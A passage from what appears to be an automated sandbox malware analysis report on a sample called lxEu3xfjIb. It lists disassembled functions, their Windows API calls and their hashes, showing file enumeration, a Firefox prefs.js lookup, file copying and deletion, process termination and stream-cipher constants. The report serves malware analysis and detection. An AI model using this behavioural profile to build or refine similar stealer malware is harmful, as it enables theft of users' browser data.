                                              Download Yara Rule
                                              APIs
                                              • wsprintfA.USER32 ref: 00414113
                                              • FindFirstFileA.KERNEL32(?,?), ref: 0041412A
                                              • StrCmpCA.SHLWAPI(?,00420F94), ref: 00414158
                                              • StrCmpCA.SHLWAPI(?,00420F98), ref: 0041416E
                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 004142BC
                                              • FindClose.KERNEL32(000000FF), ref: 004142D1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Find$File$CloseFirstNextwsprintf
                                              • String ID: %s\%s
                                              • API String ID: 180737720-4073750446
                                              • Opcode ID: 9d44ee2d1d3302ed3f560bb1c24b0dbad1817cb41e0c40033f90fa3194e93cf6
                                              • Instruction ID: fabef74ebea8da44b501a85f582971371f90885c40acf49b74ac124388ccf1e1
                                              • Opcode Fuzzy Hash: 9d44ee2d1d3302ed3f560bb1c24b0dbad1817cb41e0c40033f90fa3194e93cf6
                                              • Instruction Fuzzy Hash: 745179B1904118ABCB24EBB0DD45EEA737DBB58304F4045DEB60996090EB74ABC5CF59
                                              Function 04854A27 Relevance: 22.6, APIs: 15, Instructions: 137stringmemoryfileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 04854A37
                                              • RtlAllocateHeap.NTDLL(00000000), ref: 04854A3E
                                              • wsprintfA.USER32 ref: 04854A5D
                                              • FindFirstFileA.KERNEL32(?,?), ref: 04854A74
                                              • StrCmpCA.SHLWAPI(?,00420FAC), ref: 04854AA2
                                              • StrCmpCA.SHLWAPI(?,00420FB0), ref: 04854AB8
                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 04854B42
                                              • FindClose.KERNEL32(000000FF), ref: 04854B57
                                              • lstrcat.KERNEL32(?,006D6F24), ref: 04854B7C
                                              • lstrcat.KERNEL32(?,006D6C2C), ref: 04854B8F
                                              • lstrlen.KERNEL32(?), ref: 04854B9C
                                              • lstrlen.KERNEL32(?), ref: 04854BAD
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                              • String ID:
                                              • API String ID: 671575355-0
                                              • Opcode ID: 40b38b74226c8604f7a13fd3e1b0225e2dd82a7444d87f96db159f9eec02a11e
                                              • Instruction ID: 92e43ff97f737020111f6010c389e9f336ac723d4cafc64ecd46fdff6bb0ff4b
                                              • Opcode Fuzzy Hash: 40b38b74226c8604f7a13fd3e1b0225e2dd82a7444d87f96db159f9eec02a11e
                                              • Instruction Fuzzy Hash: 3E519571940218ABDB64EB74DC88FED737DAB58700F404B8AB649D2090EB74ABC4CF52
                                              Function 04854357 Relevance: 18.1, APIs: 12, Instructions: 133fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • wsprintfA.USER32 ref: 0485437A
                                              • FindFirstFileA.KERNEL32(?,?), ref: 04854391
                                              • StrCmpCA.SHLWAPI(?,00420F94), ref: 048543BF
                                              • StrCmpCA.SHLWAPI(?,00420F98), ref: 048543D5
                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 04854523
                                              • FindClose.KERNEL32(000000FF), ref: 04854538
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Find$File$CloseFirstNextwsprintf
                                              • String ID:
                                              • API String ID: 180737720-0
                                              • Opcode ID: ac94dde27fa3a8b2d1992181d9aeba8d94f37141b24e2c59e50ce182db00ab73
                                              • Instruction ID: 901725686dac14a73333c449b8e34f4d33bb61dbf5bc201875f00340ebca11ca
                                              • Opcode Fuzzy Hash: ac94dde27fa3a8b2d1992181d9aeba8d94f37141b24e2c59e50ce182db00ab73
                                              • Instruction Fuzzy Hash: B751B7B1904218ABDB24EB74DD84FEA737CBB54304F404BC9B649D2050EBB5AB88CF51
                                              Function 0040EE20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • wsprintfA.USER32 ref: 0040EE3E
                                              • FindFirstFileA.KERNEL32(?,?), ref: 0040EE55
                                              • StrCmpCA.SHLWAPI(?,00421630), ref: 0040EEAB
                                              • StrCmpCA.SHLWAPI(?,00421634), ref: 0040EEC1
                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0040F3AE
                                              • FindClose.KERNEL32(000000FF), ref: 0040F3C3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Find$File$CloseFirstNextwsprintf
                                              • String ID: %s\*.*
                                              • API String ID: 180737720-1013718255
                                              • Opcode ID: 44e4519d460c571b6f7c13e0b12cc26d697540730552fd87f4480f32e4084b77
                                              • Instruction ID: d58f243a0e81953373eaf00141ed8e3e8bc28467f540fc5aad09a1a01b74b281
                                              • Opcode Fuzzy Hash: 44e4519d460c571b6f7c13e0b12cc26d697540730552fd87f4480f32e4084b77
                                              • Instruction Fuzzy Hash: 79E16371A121189ADB14FB61DC62EEE7339AF50314F4045EEB10A62092EF386BD9CF59
                                              Function 0487F4FF Relevance: 17.4, Strings: 13, Instructions: 1151COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: 2-by$2-by$2-byexpa$expa$expa$expand 3$expand 32-by$nd 3$nd 32-by$te k$te k$te k$te knd 3expand 32-by
                                              • API String ID: 0-1562099544
                                              • Opcode ID: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                              • Instruction ID: 6662a63ba0b3be70bce2e54dd30bd0664bdb013d324eab704435fe0c4fc740cb
                                              • Opcode Fuzzy Hash: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                              • Instruction Fuzzy Hash: C4E276B09083808FD7A4CF29C580B8BFBE1BFC8354F51892EE99997211D770A959CF56
                                              Function 0040DF10 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 370fileCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00420C32), ref: 0040DF5E
                                              • StrCmpCA.SHLWAPI(?,004215C0), ref: 0040DFAE
                                              • StrCmpCA.SHLWAPI(?,004215C4), ref: 0040DFC4
                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0040E4E0
                                              • FindClose.KERNEL32(000000FF), ref: 0040E4F2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                              • String ID: 4@$\*.*
                                              • API String ID: 2325840235-1993203227
                                              • Opcode ID: 3cdc3bc1ca4623dd4ab3a98770b64da100480c73e045b6562c069503d68560b6
                                              • Instruction ID: 5b1d21d8256b1a4f75019a03d5e94b0e3f490a8b44af3c5bb40891ece502d815
                                              • Opcode Fuzzy Hash: 3cdc3bc1ca4623dd4ab3a98770b64da100480c73e045b6562c069503d68560b6
                                              • Instruction Fuzzy Hash: F6F14D71A151189ACB25EB61DCA5EEE7339AF14314F4005EFB10A62091EF387BD8CF5A
                                              Function 0040F7B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                                • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004216B0,00420D97), ref: 0040F81E
                                              • StrCmpCA.SHLWAPI(?,004216B4), ref: 0040F86F
                                              • StrCmpCA.SHLWAPI(?,004216B8), ref: 0040F885
                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0040FBB1
                                              • FindClose.KERNEL32(000000FF), ref: 0040FBC3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                              • String ID: prefs.js
                                              • API String ID: 3334442632-3783873740
                                              • Opcode ID: fa97d7417b00e0ed7db09385c6ddcfeec11e37439937ba94b1fa1e1cdc91277e
                                              • Instruction ID: 41002e5bbb8aa5eaa1de2a73ae7baa64e6dc855d43d68c47d205a656f8df75cd
                                              • Opcode Fuzzy Hash: fa97d7417b00e0ed7db09385c6ddcfeec11e37439937ba94b1fa1e1cdc91277e
                                              • Instruction Fuzzy Hash: 84B19371A011089BCB24FF61DC96FEE7379AF54304F0045AEA50A57191EF386B98CF9A
                                              Function 00401710 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00425244,?,00401F6C,?,004252EC,?,?,00000000,?,00000000), ref: 00401963
                                              • StrCmpCA.SHLWAPI(?,00425394), ref: 004019B3
                                              • StrCmpCA.SHLWAPI(?,0042543C), ref: 004019C9
                                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401D80
                                              • DeleteFileA.KERNEL32(00000000), ref: 00401E0A
                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00401E60
                                              • FindClose.KERNEL32(000000FF), ref: 00401E72
                                                • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                                • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                              • String ID: \*.*
                                              • API String ID: 1415058207-1173974218
                                              • Opcode ID: 15f4b34df85bfc17be5ad473dee7c45c6665dc634d808535e379f0e4dc2031a1
                                              • Instruction ID: a576ed9f26fd673c6d53a896fc8188a2a0655e62510251b9f9068b5a07b58df1
                                              • Opcode Fuzzy Hash: 15f4b34df85bfc17be5ad473dee7c45c6665dc634d808535e379f0e4dc2031a1
                                              • Instruction Fuzzy Hash: 45125071A111189BCB15FB61DCA6EEE7339AF14314F4045EEB10662091EF386BD8CFA9
                                              Function 0484F087 Relevance: 13.9, APIs: 9, Instructions: 369fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • wsprintfA.USER32 ref: 0484F0A5
                                              • FindFirstFileA.KERNEL32(?,?), ref: 0484F0BC
                                              • StrCmpCA.SHLWAPI(?,00421630), ref: 0484F112
                                              • StrCmpCA.SHLWAPI(?,00421634), ref: 0484F128
                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0484F615
                                              • FindClose.KERNEL32(000000FF), ref: 0484F62A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Find$File$CloseFirstNextwsprintf
                                              • String ID:
                                              • API String ID: 180737720-0
                                              • Opcode ID: 922fd519c71b6af3ccb31eb3f6638551c52bf54377e7cc35e7fa9b6b37ebfbe3
                                              • Instruction ID: 24fe5e8d21fc3edaeeec9822932b052fbb490c8deb5d0831921600375d508643
                                              • Opcode Fuzzy Hash: 922fd519c71b6af3ccb31eb3f6638551c52bf54377e7cc35e7fa9b6b37ebfbe3
                                              • Instruction Fuzzy Hash: 3DE1C6719012185AEB5DFB64DC91EEE7338AF54205F404BEDA90AA2061EFB07F89CF51
                                              Function 0040DB80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                                • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215A8,00420BAF), ref: 0040DBEB
                                              • StrCmpCA.SHLWAPI(?,004215AC), ref: 0040DC33
                                              • StrCmpCA.SHLWAPI(?,004215B0), ref: 0040DC49
                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0040DECC
                                              • FindClose.KERNEL32(000000FF), ref: 0040DEDE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                              • String ID:
                                              • API String ID: 3334442632-0
                                              • Opcode ID: 62dd4eb8aaf485a9b3b424bef752cb1b9e720914b8e7beaa3b58e856919e7599
                                              • Instruction ID: c85deeef17d72a94dc1f170446f25d55197e78b42259dde6f56d7dfc7a2e5770
                                              • Opcode Fuzzy Hash: 62dd4eb8aaf485a9b3b424bef752cb1b9e720914b8e7beaa3b58e856919e7599
                                              • Instruction Fuzzy Hash: 40917572A001049BCB14FBB1ED96DED733DAF84344F00456EF90666185EE38AB5CCB9A
                                              Function 0484DDE7 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0485ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0485ACFF
                                                • Part of subcall function 0485AE97: lstrcpy.KERNEL32(00000000,?), ref: 0485AEE9
                                                • Part of subcall function 0485AE97: lstrcat.KERNEL32(00000000), ref: 0485AEF9
                                                • Part of subcall function 0485AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0485AF3C
                                                • Part of subcall function 0485AF27: lstrcpy.KERNEL32(00000000), ref: 0485AF7B
                                                • Part of subcall function 0485AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0485AF89
                                                • Part of subcall function 0485AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0485AE7C
                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215A8,00420BAF), ref: 0484DE52
                                              • StrCmpCA.SHLWAPI(?,004215AC), ref: 0484DE9A
                                              • StrCmpCA.SHLWAPI(?,004215B0), ref: 0484DEB0
                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0484E133
                                              • FindClose.KERNEL32(000000FF), ref: 0484E145
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                              • String ID:
                                              • API String ID: 3334442632-0
                                              • Opcode ID: 9542da5adebdb47cc6cff0dfe2dad098e23cc50c49b1f7ea439975f769b5948d
                                              • Instruction ID: d1dff57ae4ae0728b311f2b09244ddb9ed12c53b5cc4dbc18626308155835d0d
                                              • Opcode Fuzzy Hash: 9542da5adebdb47cc6cff0dfe2dad098e23cc50c49b1f7ea439975f769b5948d
                                              • Instruction Fuzzy Hash: 55915672A001089BDB18FBB4EC95DED7379AFD4205F004F6DAC46D6150EEB4BB488B92
                                              Function 0484FA17 Relevance: 12.3, APIs: 8, Instructions: 275fileCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0485ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0485ACFF
                                                • Part of subcall function 0485AE97: lstrcpy.KERNEL32(00000000,?), ref: 0485AEE9
                                                • Part of subcall function 0485AE97: lstrcat.KERNEL32(00000000), ref: 0485AEF9
                                                • Part of subcall function 0485AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0485AF3C
                                                • Part of subcall function 0485AF27: lstrcpy.KERNEL32(00000000), ref: 0485AF7B
                                                • Part of subcall function 0485AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0485AF89
                                                • Part of subcall function 0485AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0485AE7C
                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004216B0,00420D97), ref: 0484FA85
                                              • StrCmpCA.SHLWAPI(?,004216B4), ref: 0484FAD6
                                              • StrCmpCA.SHLWAPI(?,004216B8), ref: 0484FAEC
                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0484FE18
                                              • FindClose.KERNEL32(000000FF), ref: 0484FE2A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                              • String ID:
                                              • API String ID: 3334442632-0
                                              • Opcode ID: 20d2439061f2986c118ea83818572df10c4fe56ef9868c5e75f33f4f1b478f52
                                              • Instruction ID: 6c1fbc9f2c174885dd6178f49d78e27a5a030f9cbbf4600bbe243e3e4e7a6ef7
                                              • Opcode Fuzzy Hash: 20d2439061f2986c118ea83818572df10c4fe56ef9868c5e75f33f4f1b478f52
                                              • Instruction Fuzzy Hash: ABB111719002189BDB68FB64DC94EED7375AF94305F404BAD990AD6160EFB07B48CF92
                                              Function 004198E0 Relevance: 12.1, APIs: 8, Instructions: 55processCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00419905
                                              • Process32First.KERNEL32(00409FDE,00000128), ref: 00419919
                                              • Process32Next.KERNEL32(00409FDE,00000128), ref: 0041992E
                                              • StrCmpCA.SHLWAPI(?,00409FDE), ref: 00419943
                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0041995C
                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 0041997A
                                              • CloseHandle.KERNEL32(00000000), ref: 00419987
                                              • CloseHandle.KERNEL32(00409FDE), ref: 00419993
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                              • String ID:
                                              • API String ID: 2696918072-0
                                              • Opcode ID: 70d4dbc2df0c449e42b531910b7457683d7e33f1b1efd4492f1c83a3618bacdf
                                              • Instruction ID: 9e175830caf9148bd7a219e001ec971bef60eefc02138b6d75eb658f8e5d4480
                                              • Opcode Fuzzy Hash: 70d4dbc2df0c449e42b531910b7457683d7e33f1b1efd4492f1c83a3618bacdf
                                              • Instruction Fuzzy Hash: 94112EB5E15218ABCB24DFA0DC48BDEB7B9BB48700F00558DF509A6240EB749B84CF91
                                              Function 04859B47 Relevance: 12.1, APIs: 8, Instructions: 55processCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04859B6C
                                              • Process32First.KERNEL32(0484A245,00000128), ref: 04859B80
                                              • Process32Next.KERNEL32(0484A245,00000128), ref: 04859B95
                                              • StrCmpCA.SHLWAPI(?,0484A245), ref: 04859BAA
                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 04859BC3
                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 04859BE1
                                              • CloseHandle.KERNEL32(00000000), ref: 04859BEE
                                              • CloseHandle.KERNEL32(0484A245), ref: 04859BFA
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                              • String ID:
                                              • API String ID: 2696918072-0
                                              • Opcode ID: 70d4dbc2df0c449e42b531910b7457683d7e33f1b1efd4492f1c83a3618bacdf
                                              • Instruction ID: b0ee55d6fd6480cb230b61a0dcf08457ba1f0a278d2dd5e3cd08cd85a9166229
                                              • Opcode Fuzzy Hash: 70d4dbc2df0c449e42b531910b7457683d7e33f1b1efd4492f1c83a3618bacdf
                                              • Instruction Fuzzy Hash: 331121B5E05218EBDB24DFA5DC88BDE7779BB48700F008689F905E6250E734AB44CF51
                                              Function 0040E530 Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 514fileCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                                • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00420D79), ref: 0040E5A2
                                              • StrCmpCA.SHLWAPI(?,004215F0), ref: 0040E5F2
                                              • StrCmpCA.SHLWAPI(?,004215F4), ref: 0040E608
                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0040ECDF
                                              Strings
